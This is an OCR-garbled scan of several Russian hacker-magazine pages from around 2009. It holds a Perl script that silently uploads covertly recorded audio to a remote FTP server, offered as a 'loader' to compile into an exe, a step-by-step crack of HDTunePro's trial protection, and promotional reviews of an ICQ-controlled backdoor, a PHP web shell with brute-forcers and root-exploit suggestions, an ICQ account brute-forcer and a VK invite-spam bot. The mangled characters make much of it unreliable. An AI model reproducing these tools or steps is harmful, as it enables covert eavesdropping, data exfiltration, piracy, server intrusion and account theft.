ЕТР-сервертебе все равно придется, поэтому 
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ЗАБИРАЕМ НАЖИТОЕ:) 




Файл Правка Вид Избранное Сервис Справка 
0Наид ’ 0 ' й Р Поиск Папки [777] ' 




ѵ | Д Переход 



10.03,2009.20.19.03.™ 



10 .03 2009 .20.19.09 ►ѵѵта 



10 .03 .2009 .20.19.15 . ѵѵта 



10 .03 .2009 .20.19.21 .ѵѵта 



10.03,2009.20.19.29.™ 



10 .03 .2009 .20 .19.35 .ѵѵта 



10,03.2009.20.19,41,™ 



Й 

<& 

б 

Й 

© 

© 



1 0. 08. 2009, 20, 1 9, 06, ша 



10.08.2009,20.19.12.™ 



10.08.2009.20.19.18.™ 



1 0. 08. 2009, 20. 1 9. 26. ша 



10.08.2009,20.19.32.™ 



10,08.2009.20.19.38,™ 




Не забывай о собс- 
твенной безопаснос- 
ти и помни, чтолюбой 
компьютероподобный 
девайс может быть 
использован в качес- 
тве средства скрытой 
звукозаписи! 




> СІѴСІ 

Утилы МісВру 
и Міс5ру++ты 
найдешь на нашем 
диске. К первой из 
нихдаже прилагают- 
ся сорцы. 



я решил немного упростить твою задачу, выложив часть 
своего Регі-сорца: 

# ! /изг/Ъіп/регІ 
#ргіпС " 

= \п" ; 

#ргіпС " = Зшаіі РТР Ьоасіег = 

#ргіпС "================================== 

= \п" ; 

изе БеС : : РТР; 

$РСр_зегѵег = "ЫаЫаЫа.сош"; #РТР-сервер 
$РСр_изег = "изег" ; #логин на іЩр- сервер 
$РСр_разз = "раззчлгогсі" ; #пароль на РСр-сервер 

$РСр = БеС : : РТР->пем ( " $ РСр_зегѵег " , Раззіѵе 
= > 1 ) ; 

$РСр->1одіп ( " $РСр_изег " , " $РСр_разз " ) ; 

$ 1:Цр->смс1 ( ' /сіошаіпз/ЫаЫаЫа . сот' ) ; 
$РСр->Ьіпагу ( ) ; 

$ РСр->ткс1іг ( " /йотаіпз/ЫаЫаЫа . сот/іодз " ) ; 
орепсііг (ЬБІК, " С : \ \каталог_с_ 
аудиофайлами\ \ " ) ; #открываем каталог с аудио- 
файлами 
$соипД=1 ; 

ѵ/МІе ( $Рі1епаше = геасісііг ЬБІК) { 

ІТ ( $соипД>2 ) { 

$РСр->риС ( " С : \ \каталог_с_ 
аудиофайлами\\$Рі1епаше" , "/сіотаіпз/ 
ЫаЫаЫа . сош/1одз/$Рі1епаше" ) ; #передаем 
все аудиофайлы из каталога на наш РТР-сервер 
} 

$соипД++ | 

} 



сіозе ЬРІЬР; 
сіозесііг ЬБІК; 

$РСр->диіС ( ) ; 

Скрипт довольно прост и позволяет лишь копировать 
все содержимое конкретного каталога на удаленный 
РТР-сервер. Однако, модернизировав его и скомпилив 
в ехе-файл (например, при помощи Рег12Ехе], ты полу- 
чишь простенький лоадер с вполне рабочим функцио- 
налом. 

В общем, все зависит исключительно от тебя, твоих це- 
лей и средств (наличия прямых рук и светлой головы]. 
Существует множество способов реализации «ком- 
пьютерной» прослушки; я уже молчу о КПК, ведь софт 
под мобильные платформы никто не отменял, правда? 
Ас наличием микрофонов на всех коммуникаторах и 
смартфонах проблем точно нет... но это уже совсем 
другая история. 

НЕБОЛЬШОЙ Р.5. 

В статье я сознательно не стал раскрывать все подробнос- 
ти организации прослушки в планетарных масштабах, и 
тому есть несколько причин. Во-первых, подобные дейс- 
твия четко регулируются законодательством, а во-вторых, 
суть в другом. Я хотел, чтобы ты понял, насколько уязвим 
каждый из нас в повседневной жизни, и предпринял меры 
по обеспечению собственной безопасности, — контро- 
лировал все звукозаписывающие и звукопередающие 
устройства в имеющейся утебя технике. Конечно, об 
отключении микрофона втвоем мобильнике речи не идет, 
нос компом все гораздо проще :]. Жертвовать ли 
удобством ради безопасности — решать тебе, но я 
надеюсь, ты сделаешь правильный выбор. □с 




> іпіо 

Внимание! Инфор- 
мация представлена 
исключительно 
с целью ознаком- 
ления! Ни автор, ни 
редакция за твои 
действия ответствен- 
ности не несут! 
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ХАРДКОРНЫЙ 

ТЮНИНГ 

Исследование защиты НШТипеРВо 

Наконец-то разработчики софта стали прислушиваться кхакерам! 
Примитивные модули проверки регистрации постепенно уходят 
в прошлое. Протекторы, запутанный и разбросанный код модуля 
проверки, неявные вызовы процедур, громадное количество вызо- 
вов, проверка флага трассировки и иже сними. Это лишь примерный 
4 - список инструментов, с помощью которых разработчики строят, по их 
выражению, мощные и непробиваемые защиты! Но зачастую реалии 
далеки отсовершенства. Смотри сам. 



КАРТА ПРОГРАММЫ: 



З адумайся — много ли можно получить, 
сломав прогу правкой одного байта, 
особенно если это правка в стиле 
«условный переход на безусловный»? 
Наверняка, нет! И таких программ (как и рас- 
тяп-программистов] большинство. Возникает 
ощущение: содружество программистов давно 
принялотакой подход как международный 
стандарт! На наше счастье попадаются исклю- 
чения, когда в реализации защиты встречают- 
ся просветы креативных мыслей. Дабы помочь 
в освоении приемов противостояния более 
сложным техникам защиты (в особенности, 
быстрому исследованию], предлагаю окунуться 
в эти самые элементы креативного творчества. 

ВЫБОРЖЕРТВЫ 

Нет смысла описывать саму прогу НбТипеРго 
3.50 — выбор продиктован лишь целью 
исследования защиты. Для начала примерно 
определимся, с чем мы имеем дело. Некоторые 
сейчас же скажут, что нужно взять РЕЮ и про- 
верить файл на упакованность — это, конечно, 
верно, но не совсем! 

Сперва необходимо просто запустить испол- 
няемый файл и поверхностно проанализиро- 
вать принцип работы регистрации. Создается 
окошко, вбиваются значения (сколько осталось 



дней до окончания 
триал периода], 
а в главном окне 
программы красу- 
ется заголовокТгіаІ 
ѵегзіоп. В общем, 
надежды на быстрый 
взлом нет. Это вам не 
МеззадеВох! :). 

После перевода даты на три дня вперед про- 
грамма посчитала, что 1 5 дней прошло и даже 
после установки легальной даты я оказался 
с оконченным триал-перидом. Мониторинг 
обращений к реестру и файлам также не принес 
весомого результата — программа обращается 
кслишком большому количеству элементов и 
анализировать ихутомительно. 

Ладно, как видно из РЕЮ, ничего страшного из 
протекторов нас не ожидает. Что ж, уже немного 
легче! Запускаем ОИуОЬд, грузим МШперго. 
ехе. Для пущей убедительности в отсутствии 
антиотладки запустим на выполнение. Видим, 
что все работает! Теперь главный вопрос — с 
чего начать? Первое, что пришло в голову — 
повторить пример взлома ѴѴіпРАР 3.42 в испол- 
нении Криса Касперски. Суть метода заклю- 
чалась в подавлении І\ІА6 при помощи правки 
инструкции сравнения реального количества 
дней с числом 40. В нашем случае авторы ока- 
зались людьми жадными, и число таких дней 
будет 1 5. То есть, надо найти инструкцию стр 
еах, ОРИ (число 1 5 в Ьехе — это Е], которая нас и 
выведет к І\ІАО. Находим и ставим бряки, ведь 
их больше чем одна (вообще, у меня их 1 1]. 

В моем случае первый бряксработал по адресу 
0041 0А55, значение регистра еах возрастает 
от нуля до пятнадцати; затем бряк по адресу 



00410В32 и последний — перед всплытием 
І\ІА6 (адрес остановки будет 0041 0С0Е]. После 
нажатия «ОК» (в случае окончания триала] 
действия повторяются. Гм! Теоретически мы 
стобой могли бы взяться за разбор именно 
с этого места, но, забегая вперед, скажу, что 
это лишь шестеренка в большой системе. Нам 
важно быстренько восстановить весь механизм 
от начала и до конца. 

ИНЪЕКЦИЯ БРЯКОВ 

Надо искать АРІ, которая ответственна за 
создание самого окна ЫАС. 

Перебираем наиболее подходящие в спис- 
ке импорта: СгеаіеОіаІод с ОіаІодВох. Таких 
нет! Значит, есть что-то другое. Окна, окна... 

ѴѴі псіоѵѵз, СгеаІеѴѴіпсІоѵѵЕхА (исходя из на- 
звания, родственные ей АРІ — ЗЬоѵѵѴѴіпсІоѵѵ, 
ЕпаЫеѴѴіпсІоѵѵ, ЗеІіѴѴі псІоѵѵТехЕА] . А, вот, такая 
есть! Основной вызов в 0045Е701 с кучей пара- 
метров. Здесьже видим адрес самой функции, 
в теле которой вызов — 0045Е663. Есть семь 
мест, откуда она будет вызвана. Чтобы узнать, 
кто вызывает нашу функцию, по каждому месту 
вызова можно поставить бряк. 

Попробуй протрассируй и убедишься, что 
функция СгеаІюѴѴіпсІоѵѵЕхА будет вызвана два 
раза. Первый разтыувидишьокно в верхнем 
левом углу монитора с нулевой шириной и 
длиной (возможно, это главное окно програм- 
мы, которое потом при надобности, а точнее, 
при отсутствии у нас проблем стриал периодом, 
будет установлено в нормальный режим]. А вот 
второе окошко — это создание І\ІАО. Во всяком 
случае, очень похоже. Восстановим цепочку 
всего вызова с помощью инъекта бряков — на 
каждом локальном вызове функции А поставим 
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> СІѴСІ 

На нашем ОѴО-но- 
сителе лежит карта... 
нет, не забытых 
пиратских сокровищ! 
Карта основных 
действий программы, 
связанныхтриал- 
периодом, и пос- 
ледняя на данный 
момент версия 
Обуйбд. 




НТТР://ѴѴѴШ 

I ■ 

> Ііпкз 

ѵѵѵѵѵѵ.бсбиперго. 
сот — сайт нашего 
пациента. 
уууууу.о[[ус1Ьд.с1е 
— сайт отладчика 
ОиуРЬд. 




> іпіо 

• Незабывай при инь- 
екте бряков писать в 
комментариях, зачем 
они здесь нужны — 
иначе легко запу- 
таться! 

• В прогах, наподобие 
нашей исследуемой, 
постарайся найти 
начало (инициализа- 
цию формы] и конец 
(собственно N АО] . 
Анализ середины и 
окрестностей даже с 
неявными вызовами 
будет намного легче. 

• Держи на столе бу- 
магу и ручку — состав- 
лять карты программы 
необходимо для нор- 
мального восприятия 
ее действий, а также 
для в быстрого поиска 
нужного тебе адреса. 
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ТРАССИРОВКАСУСЛОВИЕМ 




НЕХИТРЫЙ ТРЮКСТРИАЛОМ 



бряк. Запускаем программу, где бряксработал, смотрим 
тело вызвавшей функции В и ее локальные вызовы. Также 
ставим на них бряки и запускаем опять прогу. 

Вообще, смысл раскрута всей цепочки, думаю, понятен 
(конечно, болееуниверсальный метод при большом коли- 
честве вызовов и если позволяют мощности ЦП — ставить 
брякпоусловию.жать <СМ+Т> и трассировать с заходом в 
процедуры по <СМ+Е1 1 >]. Вопрос: до какого момента все 
это крутить? Сейчасувидишь! Наша подопытная функция 
вторично будет вызвана по адресу 0045С552 втеле функции 
0045С516. У последней два возможных локальных вызова, 
из них сработал только 0041 58Е8. Вот, кажется, и приехали! 
Последний вызов происходит втеле громадной функции 
(остальные были не более 20 строкассемблерного кода]. 
Надо бы ее просмотреть! После непродолжительного 
скроллинга вниз натыкаемся на занос в офсетуказате- 
ля на строку «%з (Егіаі ѵегзіоп]» (0041 5А2В]. Затем будет 
вызов функции без аргументов, и потом вызов функции 
с аргументом (0041 5А43]. Исходя из этого, замечаем, что 
строка «%з (ігіаіѵегзіоп]» должна где-то всплыть. Особенно 
если есть%5, — вместо нее должно быть задано значение. А 
незашифрованные строки говорят о том, что разработчики 
думают через раз! По перекрестным ссылкам можно, как по 
бульвару, добраться до защитного механизма. Это сущест- 
венно сэкономит время. Но интересные нам аргументы (Тгіаі 
ѵегзіоп, Ігіаі регіоб ехрігеб] расположены достаточно далеко 
друг от друга, как по адресам, так и по ходу выполнения. Не 
очень-то удобно. Надо смотреть, что передается в аргумент 
функции (содержимое ЕСХ]. 

После вызова безаргументной функции идут инструкции 
выталкивания из стека 12 байт, затем присвоение ЕСХ 
содержимого стека со смещением 906 и много других неин- 
тересных вещей. Короче, ставим бряк на аргумент и видим, 
что в стеке позаданному смещению находится НОТипе Рго 
3.50 (ігіаіѵегзіоп], что является заголовком главного окна! 
Асам САН 00461 СС9 представляет собой тривиальный 
вызов ЗеіѴѴіпсІоѵѵТехіА (перейди по адресу СаІГа] — функ 
ции, которая и занесет новый заголовок. Афункция без 
аргументов просто вставит вместо %з первичный заголовок 
окна программы. Каквидишь.теперьситуация несколько 
прояснилась. Дальше должно быть интересней! Ты сейчас 
можешь возразить — какже так, мы просмотрели самое 
интересное, выходит, что программа уже знает, что версия 
просрочена и переделала заголовококна. Ну и что? Если 
бряки на стр еах, ОРИ до сих порутебя стоят, то видно, что 
их выполнение сработает после подмены заголовка главно- 
го окна. Да и вообще — кто помешает проге также обратно 



заменить сарбоп? 

Так что — идем далее! А дал ее идет тривиальный вызов 
МеззадеВохАс руганью об обломе пользователей с ѴѴіпбоѵѵз 
95\98\МЕ... Для тех, кто хочет сделать наоборот: наградить 
юзеров этих версий поддержкой нашей исследуемой 
программы и обломать юзеров ѴѴіпбоѵѵзХР, ѴізЕа — нужно 
по адресу 0041 5А57 исправить 6ЫЕ на 6Е. Только гарантии 
работы после этого на 95\98\МЕ я все равно недам. 

В СЕКРЕТНЫХ 
ПОДЗЕМЕЛЬЯХ 

Если мы знаем примерное место, где надо искать (а мы его 
уже знаем), то зачастую хватает визуального анализа для 
определения защитного механизма. Это сэкономит время, 
а время — деньги! Наличие комментариев (для аргумен- 
тов], которыми Ольга снабдила функции, на картинке выше 
говорит нам, что саіі по адресу 0041 5А50 должен проверять 
версию 03, а саіі 0041 5А1 Е берет кэпшн (сарбоп] глав- 
ного окна пред тем, как при клеить туда сообщение «Тгіаі 
Ѵегзіоп». Видишь, тутвсе взаимосвязано! 

Тебя в первую очередь должен заинтересовать саб 
0041 5030 (по адресу 0041 5АВЕ). Скорее всего, функция 
по адресу 0041 5030 должна бытьсвязана слогическими 
дисками — внизу в одном из аргументов красуется «І\Іо бізк 
Іоипб» (тривиальный вызов МеззадеВохА]. Утебя должны 
возникнуть подозрения, что здесь будет что-то интерес- 
ное. На глаза сразу попадаются несколько сравнений и 
условных переходов, вдобавок перед интересующей нас 
функцией — цепочка присваиваний (особенно интересно, 
что здесь фигурируют 1 и 0 — похоже на флаг регистрации]. 
Ну и поверху нас — операции с «ігіаі ѵегзіоп». Мотивации 
для детального исследования вполне достаточно. Ну, а что- 
бы сделать 100% мотивацию для исследования — перейди 
по адресу 0041 5АВЕ, жми на пробел и вводи инструкцию 
Э М Р 0041 5С2В (путь назначения перехода будет саб, отве- 
чающий за тривиальный вызов АРІ ЕпаЫеѴѴіпсІоѵѵ]. Готово? 
Запускай! Ну и что мы видим? :). 

Упс! Недоступно СотЬоВох. Исправь ризб 0 на ризб 1 , где 
вызов — тривиальный ЕпаЫеѴѴіпсІоѵѵ, о котором речь шла 
чуть выше. Воттеперь все. Однако на самом деле это еще 
далеко не все! Собственно, в СотЬоВох отсутствуют наиме- 
нования твоих жестких дисков. А где они? Пол ми нуты назад 
ты заджампил функцию их инициализации и вбивания в 
комбо! Только вотнаш ІЧАСтоже не появился! 
Догадываешься, почемутак происходит? Все потому, что 
разработчики комбинировали процедуру инициализации 
логических дисков и показ ІЧАС’а с лого окошка. Ты, конеч- 
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ВХОД В СЕКРЕТНЫЕ ПОДЗЕМЕЛЬЯ 




РАЗРАБОТЧИКИ ЛЮБЯТ ИГРАТЬ С РЕВЕРСЕРАМИ В 
ИГРУ «А ОТКУДА ВЫЗОВ ПРИШЕЛ?» 



но, можешьзайти поадресу 00415030 и начатьего исследовать, но мы 
зайдем стыла! Это быстрее и лучше. Ищи быстренько АРІ ЭЬоѵѵѴѴіпсІоѵѵ, 
которая отвечаетза показ ЫА6 — у меня бряк перед показом сработал 
по адресу 00461 ОРЗ. 

Единственное, на чем еще можно немного заострить внимание, это 
использование ЕАХ+1С как некоторого стандарта для передачи ЬапсІІе- 
окна АРІ-функциям типа ЕпаЫеѴѴіпсІоѵѵ. Естественно, для каждого окна 
будетсвой идентификатор. Так, после установки заголовка главного 
окна «ЕЮ Типе Рго 3.50 (ТгіаІѴегзіоп)» содержимое ЕАХ+1 С будет пе- 
ренесено в Стек (ЕВР-1 4]. К моменту показа ЫАО здесь собственно уже 
будетхэндл окна І\ІА6. Восстановим цепочку вызовов, конец которой 
приводит к показулоготипа окошка. Это можно сделать постановкой 
бряков на завершение функции и «зіпдіе з1;ер» после его срабатывания. 
И теперь мы окажемся на инструкцию ниже команды, которая вызвала 
подопытную функцию. 
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РЕШ В ДЕЙСТВИИ. ПРОТЕКТОРОВ И ПАКОВЩИКОВ 
НЕ НАБЛЮДАЕТСЯ 




РАССТАВЛЯЕМ БРЯКИ ПО АДРЕСАМ ЛОКАЛЬНЫХ 
ВЫЗОВОВ НАШЕЙ ФУНКЦИИ 




ОПРЕДЕЛЯЕМ ПОЛОЖЕНИЕ СИСТЕМНОЙ БИБЛИО- 
ТЕКИ Ц5ЕР32 В ПАМЯТИ НАШЕГО ПРОЦЕССА 



нам функции инициализации и вбивания в СотЬоВох имен логических 
дисков, которую мы заджампили в прошлый раз. 



00462982 (00462А5Е) -> 004615С9 ( 04613А) -> 00461БЕ5 
(00461БЕЗ) 

Авот откуда будетвызвана 00462982, мы, ксожалению, никакнеузнаем, 
таккак ни один бряк не сработал :(. Впрочем, это даже никакая неошиб- 
ка! Для исправления ситуации просто ставим брякпо адресу 00462АЕ1 
(РЕТ), что является концом нашей текущей функции, и после остановки 
и нажатия <Е8> (пошаговой трассировки] мы и находим наш адрес 
вызова (он будет находиться на одну инструкцию выше] — 00416125 
с кодом САН ОѴѴОКО РТР О5:[ЕАХ+0В8] или, если поставить бряк и 
подсмотреть значение, оно будет равняться «САРЬ 462982». Это есть 
неявный вызов функции! 

Все это используется для того, чтобы такие, как мы, не могли быстро 
восстановить место назначения вызова и, какследствие, — сорвать всю 
цепочку. Впрочем, если есть возможность, можно просто ставить бряк 
на неявный вызов и потом смотреть, что там у нас в стеке поданному 
смещению. Еще одной немаловажной деталью для тебя будетиссле- 
дованиеусловия для входа в функцию показа ІЧАО. В большинстве 
случаев ключ к разгадке кроется именно перед прыжком сусловием. Ну 
и, наконец, взгляни, где находится вызов — это тело до боли знакомой 



ЗАКЛЮЧЕНИЕ 

Описывать все действия, которые делаются в этой нехитрой проге, 
нет нужды — уйдет целый журнал. Но ведь я тебе раскрыл самый 
главный смысл! Есть карта, а остальное можно разобрать самосто- 
ятельно. 

Я лишь скажу, что, несмотря на все оружие современных программеров 
по борьбе со злостными реверсерами, взлом защиты — лишь дело вре- 
мени. Это непоколебимая истина. Если смотреть с одной стороны —то 
за достаточно жуткий вид кода (диапазон вызовов в теле одной функции 
ограничивается только ее длиной, неявные вызовы, ну и разбросан- 
ность всего триал-модуля] разработчиков надо бы хорошенько отшле- 
пать! Сколькожмашинных инструкций тратится не по назначению! Где 
она — оптимизация? 

С другой стороны, такая защита тянет на уверенную тройку — запу- 
танность и неявные вызовы это, конечно, неплохо, но явных противо- 
действий отладчику нет, равно как вызовы из системных библиотек 
открыты, можно свободно гулять по перекрестным ссылкам. Да, плюс 
ко всему, часть функций расположена строго другза другом, что зна- 
чительно упрощает анализ. А это только на руку таким реверсерам, 
как мы. не 
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Замена радмину на базе I СО 



В повседневной работе мы часто используем 
дедики, свои или чужие — такили иначе, все 
их нужно контролировать. Способов масса 
— начиная от гетоіе-десктопа и заканчивая 
Вабтіп’ом. Но как быть, если хочется иметь 
доступ к серверу круглосуточно? Регулярно 
таскать с собой ноут неудобно, но мобильник-то 
всегда в кармане :). Нет, я говорю не о реализа- 
ции гетске -десктоп а для мобильных платформ. 
Есть способ намного проще и удобнее — утила 
«ІСО Віаск Ооог Аіепка». Тулза позволяет 
управлятьудаленным дедиком посредством 
ІСО-протокола, используя в качестве клиента 
обычную асю. Дабы ввести тебя в курс дела, 
рассмотрим доступные команды софтины: 

- ЗбюѵбОезк — отобразить иконки рабо- 
чего стола 

- НібеБезк — скрыть иконки на рабочем 

столе 

- ЗЬхжЗбагб — отобразить меню «Пуск» 

- Нібезбагб — скрыть меню «Пуск» 

- ЗбюѵіГазкВаг — отобразить таскбар 

- НібеТазкВаг — скрыть таскбар 

- ЗбюілСІоск — отобразить часы 

- НібеСІоск — скрыть часы 

- ТішеРС — узнать время юзера 

- ТішеРоѵ^егРС — отобразить время ра- 
боты сеанса юзера 

- Соштапб — список комманд 

- Сбо — открыть СБ/БѴБ-привод 

- Сбс — закрыть СБ/БѴБ-привод 

- Іпбо — информация 

- Обб — выключить комп 

- КеЬооб — ребут компа 

- Мзі — клик левой кнопкой мыши 

- Мзг — клик правой кнопкой мыши 

- Мзт — клик средней кнопкой мыши 

- Ѵк_епбег — нажать епбег 

- Ѵк_езсаре — нажать езсаре 

- Ѵк_зрасе — нажать зрасе 



- БгіѵеБізб — отобразить список дис- 
ков 

- СебсІЪ — получить буфер обмена 
(текст) 

- ЗебсІЪ: — добавить в буфер обмена 
(текст) 

- Сіозе — закрыть клиент 

- СебРгос — получить список процессов 

- СопРазз — пароль соединения 

- Аиббюг — инфа о разработчиках 

- Еііеіізб: — список директорий и 
файлов в выбранном каталоге 

- Зебсигзог : — перемещение курсора 
мыши в указанную точку 

- Беібііе: — удаление файла 

- Кііібіг: — удаление каталога 

- Ореп: — открыть файл 

- Бріоаббііе: — залить файл на РТР 

- ЫишЪегНБ: — задать жесткий диск 

- ОрепБгІ : — открыть ссылку в дефолт- 
ном браузере 

- ЗеШаІІ: — параметры рабочего стола 

- КіІІРгос: — убить процесс 

- СебРабЬРгос — путь процесса 

- ОрепТХТ : — прислать текст из файла 

- ЗсгеепЗбюб : <качество> — прислать 
скриншот экрана на РТР 

- Маіі : <кому> , <от кого>,<имн от 
кого>,<тема письма>,<текст письма> — 
отправить письмо на мыло 

- МеззадеШагп : <Текст>, <Заголовок> — 
вывести на десктоп юзера сообщение : ) 

- СоруРіІе : сСтарый файл> , <Новый 
файл> — скопировать файл 

- СоруБіг : <Старая директория> , <Куда 
копировать> — скопировать каталог 

Утила обладает неслабым функционалом. 
Конечно, полноценно заменить гуишный 
интерфейс она не сможет, однако заменить 
консоль — вполне. 

Р.З. Юзать тулзу или нет — решать тебе, сорцы 
найдешь на нашем диске :). 



АВТОР: 




іі Іі ЛіЬіь/кі Ісдіь 
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ііШіДЯДіди рнрвдс-жѵн-днЕш 

Я*міх/уіи 

І УІШЕКІ 3 -ЖУК 

Возвращаясь кстарой доброй традиции — пуб- 
ликации и описанию различныхѵѵеб-шеллов, 
должен отметить, что за последнее время мне 
попалось несколько интересных скриптов по- 
добного рода. Уместить их все в одном выпуске 
Х-Тулз попросту невозможно, поэтому время от 
времени я буду выкладывать наиболееудачные 
экземпляры на нашем диске. Вэтотраз выбор 



Функциональный веб-шелл 



пал наѵѵеб-шелл под замысловатым названи- 
ем «РНРЬаВ-ЖуК-зНеІІ». Написан он на РНР и 
весит порядка 1 00 Кб. Из основных возможнос- 
тей следует выделить: 

- Файловый менеджер - наличие возмож- 
ности визуального управления файла- 
ми, открытие /чтение /редактирование/ 
загрузка /хеке -просмотр/ копирование/ 
перемещение /удаление файлов 

- Аплоад файлов — ограничение по раз- 
меру (2 метра) 

- Редактор — редактирование любых 
файлов , при наличии соответствующих 
прав 

- СМБ — консоль 

- Бэкдоры — возможность установки в 
системе перл/ехе Ъіпб-файлов 

- Забе-тобе — функции веб-шелла при 
работе с Забе_Мобе (Ж 

- ЗОБ - стандартный модуль работы с 
базой данных 

- РТР - анонимный коннект с шела на 
фтп- сервер 

- Маіі — возможность анонимной от- 
правки писем, а также возможность 
рассылки по собственному маил-листу 

- Еѵаіег - интерпретатор пхп-кода в 
системе 

- Сканеры — сканирование сервера на 
открытые порты, часто используемые 
пароли, ебс 

- Крэкеры — брут пассов по словарю и 
методом перебора (НавЪ. /ЗМТР/РОРЗ/ 
ІМАР/РТР/ЗММР/МуЗ<2Б/МЗЗ<2Б/НТТР 
Рогш/НТТР АибЬ.) 

- РгОху — встроенный анонимайзер 

- Тулзы — набор полезных утил, та- 
ких как: ѴШоів, генерация файлов 

. Ьбассезз/ .Ьбраззжі, ебс 

- Конвертация — конвертирование 
строк в шб5 , зЬ.а1, Ьех, ебс 
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Крометого, скрипт отображает максимально 
полную информацию о сервере, на котором 
размещен: 



Зегѵег: ЫаЫаЫа.сот (ІР) 

Орегакіоп зузкет: Ьігшх 

зегѵег . сіотаіп . сот 2.6.18-92.1.18. 
е15 . 028зкаЬ060 . 2 #1 8МР Тие Бап 13 
18:16:58 МЗК 2008 І686 
БеЪ зегѵег арріісакіоп : 

Араске/2 . 2 . 3 (Кеб. Нак) 

СРБ : Бпкпо™ 

Бізк зкакиз: Бзеб зразе: 22.47 СВ 
Ргее зрасе: 118.93 СВ Токаі зрасе : 
141.4 СВ 

Бзег ботаіп: Бпкпом 

Бзег пате: БШ 

БІБ - СІБ: 500 - 500 

Кесоттепсіесі Іосаі гоок ехріоікз: 

ргскі, ктбх, пехѵзтр, ршіеб, ркгасе_ 

ктоб , опд_Ьак 

Раззтлб кііе: КеабаЫе 

сРапеІ: Бпкпоѵ^ (Ьод кііе: Бок 

коипб) 

РНР ѵегзіоп: 5.1.6 
2епб ѵегзіоп: 2.1.0 

Іпсіисіе ракк: . /изг/зкаге/реаг /изг/ 
зкаге/ркр 

РНР Мобиіез : ІіЬхтІ хті члббх 

кокепігег (0.1) зузѵзкт зузѵзет 
зузѵтзд зкапбагб (5.1.6) ЗітрІеХМБ 
зоскекз ЗРБ зктор зеззіоп Кекіескіоп 
рзреіі розіх тіте_тадіс (0.1) ісопѵ 
Ьазк (1.0) дтр деккехк ккр ехік (1.4 
$Іб: ехік . с , ѵ 1.173.2.5 2006/04/10 
18:23:24 кеііу Ехр $) баке (5.1.6) 
сигі скуре саіепбаг Ъз2 2 ІіЪ (1.1) 
роге орепззі араске2капб1ег арс 
(3.0.19) бЪазе тузді (1.0) туздіі 
(0.1) РБО рбо_тузд1 (1.0.2) рсіо_ 
здііке (1.0.1) 

БізаЫеб кипскіопз: Боккіпд 
Закетобе: ОРР 
Ореп Ьазе біг: ОРР 
БВМЗ : МуЗОЬ 



Еще одним достоинством ѵѵеЬ-шелла являет- 
ся совместимость сѵѵіп-системами.такчто не 
придется напрягаться в поисках инструмента для 
управления ломаным виндовым сервером. 



ПРОГРАММА: 



].ВВІЛАІ_ Ѵ.0.7. 1 

Иауіисоуг 2000/хр 
^итм 



Если ты решил обзавестись красивым ісц- 
номерком, или же продажа уинов помогает 
тебе наскрести на пиво — без функциональ- 
ного инструмента не обойтись. Именнотаким 
является утила .ВпЛаІ, недавно обновившаяся 
до версии 0.7.1 . Тулза представляет из себя 
многопоточный брутфорсер асекс обилием 
полезных фичей: 



1. Поддержка соксов/проксиков : 
кккрз , зоскз4, зоскз5 

2 . Возможность автоматической очист- 
ки дохлых проксиков по таймеру 

3 . Возможность ручной очистки прок- 
си-листов : Сіеапир АН, Сіеапир 




.Вгиіаі ѵ. 0.7.1 




ТКгеа^з: 


0/100 




Кетаіпз: 


0 


Змр 


Вак 


0 


Раизе 


<300^ 


0 


Сіеапир АП 


НТТРз: 


0/0 


Сіеапир НТТРз 


5о<кз4: 


0 /0 


Сіеапир 5оскз4 


ЗоскзБ: 


0 /0 


Сіеапир ЗоекзЗ 




0,00/0,00 


100 5е( 


Тігпеі 


00:00:00 


Тігпеоиі: 15 10 Зеі 


Сіеапир: 


00:05:00 


Сіеапир: 5 Зеі 


БізсЫгпег: ТЫз ргофагп 


сгеа*е(І й>г ^сіис^сіогкаі ригроз 



РиЬоѵоі ѴІС,рпуйсг (АІІсПНѵПІ Тк ѵсгііюп пй іт *вІе) 



Ме»0 Параметры Стофшен*? 



ПадннгЕО Провдн Бтллкт Грута Проеерй» дечунтсе 



Кѳл-вогхюксм: О 
Коп-до Ё5: О 
Коп-южк.: & 



Успешно 
Запрещена О 
Неуд. по линнту: 0 

Кол-во попжки: 



К. мпросов: 0 
Кат; С 



@ 



на тромрку йисас Ю: 



Функциональный ѵ 



Удобный инструмент для брута асек :] 



НТТРз , Сіеапир 8оскз4 , Сіеапир 
8оскз5 

4 . Регулировка количества потоков 

5 . Функция ТітеОик , первое поле — 
таймаут на подключение (в секундах) , 
второе — таймаут на чтение /запись (в 
секундах) 

Утила использует несколько файлов: 

• зоигсе.Ш — здесь лежатзаписи вида 
уищпасс, например: 



тулза займет достойное место в твоем наборе 
повседневных утил. 

[!ыУ^^Р 0У^2000/ХР 

ПЯЯ пыховой 

С ростом популярности социальных сетей 
растет и количество разнообразного софта для 
них. На страницахжурнала я не раз выклады- 
вал интересные утилы подобного рода, поэтому 
перейдем к софту. Сегодня я хочу обратить 
твое внимание натулзу под названием Рибоѵоі 
Іпѵііеп Прога предназначена для автомати- 
зации инвайтинга новых юзеров в группы на 
ѵѵѵѵѵѵ.ѵкопіакіе.ги . Из особенностей утилы 
можно выделить: 



123456 ; фѵегкуі 
111122 ; <дмегку2 
111222 ; фѵегкуЗ 
111112; сдтлегку 4 

• ІізкМ — здесьуказываем списки для брута, 
каждый из указанных файлов должен содер- 
жатьзаписи вида уищпасс: 

зоигсеі . кхк 
зоигсе2 . кхк 
зоигсеЗ . кхк 

• зегѵегз.М — сюда вбиваем списокірщогі 
100-серверов, рекомендуется указывать порт 
443, например: 

64.12.200.89:443 

205.188.251.43:443 

205.188.251.11:443 

205.188.251.6:443 

205.188.251.16:443 

205.188.251.21:443 

205.188.251.26:443 

205.188.251.31:443 

• ЬНрз.М — список проксиков (ір : рогк) 

• зоскзФ.М — списоксокс 4 (ірщоН) 

• зоскзб.Ш — списоксоксб (і р :рогк) 

• дооб.М — сюда записываются валидные 
пары уинщасс 

• сопЛд.М — конфигутилы, создается автома- 
тически, записи вида: 

Ткгеабз =100 
СоппескіопТітеоик = 15 
КеабТітеОик = 10 
СІеапБр = 5 

Словом, если ты увлекаешься брутом асек — 



• Поддержка многопоточности (<= 50 0 
потоков ) 

• Возможность работы через ас- 
зегѵісе (сервис автоматического рас- 
познавания капчи) 

• Возможность использования прокси- 
листа 

• Встроенный прокси-чекер 

• Функция сохранения настроек 

• Функция проверки баланса в ас- 
зегѵісе 

• Ведение полного логирования всех 
действий утилы 

Стоит отметить, что рассылка приглашений — 
не единственная функция утилы, ибо функцио- 
нал ее намного шире: 

• Приглашение новых юзеров в группу 
по списку ІБ, с использованием 1-го 
или нескольких аккаунтов 

• Ведение блэк-листа — в случае, если 
юзер запретил отправку приглашений, 
он заносится в блэк-лист 

• Встроенный ІБ-парсер — в случае от- 
